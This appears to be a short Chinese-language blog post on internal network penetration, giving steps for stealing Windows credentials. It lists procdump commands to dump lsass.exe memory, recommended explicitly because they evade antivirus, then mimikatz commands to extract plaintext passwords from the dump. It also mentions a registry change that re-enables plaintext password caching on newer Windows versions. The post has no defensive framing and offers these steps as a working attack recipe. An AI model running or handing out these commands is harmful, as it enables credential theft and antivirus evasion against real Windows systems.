内网渗透-Windows密码凭证获取
发布时间
阅读量:
阅读量
以下是一些用于获取Windows系统凭证信息的工具记录
Windows凭证提取技术
1, procdump(官方工具,具备绕过杀毒软件检测的能力)(推荐使用)
通过procdump配合mimikatz读取生成的dmp文件,从而提取其中存储的明文密码(procdump可有效规避杀毒软件检测)
管理员运行工具,导出为lsass.dump文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp #32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统
将lsass.dmp放在mimikatz同一目录,读取密码文件
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
2, 注册表读取windows hash (首选)
针对win10或2012R2及以上版本的操作系统,默认情况下会在内存缓存中禁用明文密码的存储,然而通过调整注册表设置,仍可实现对明文密码的获取。
全部评论 (0)
还没有任何评论哟~
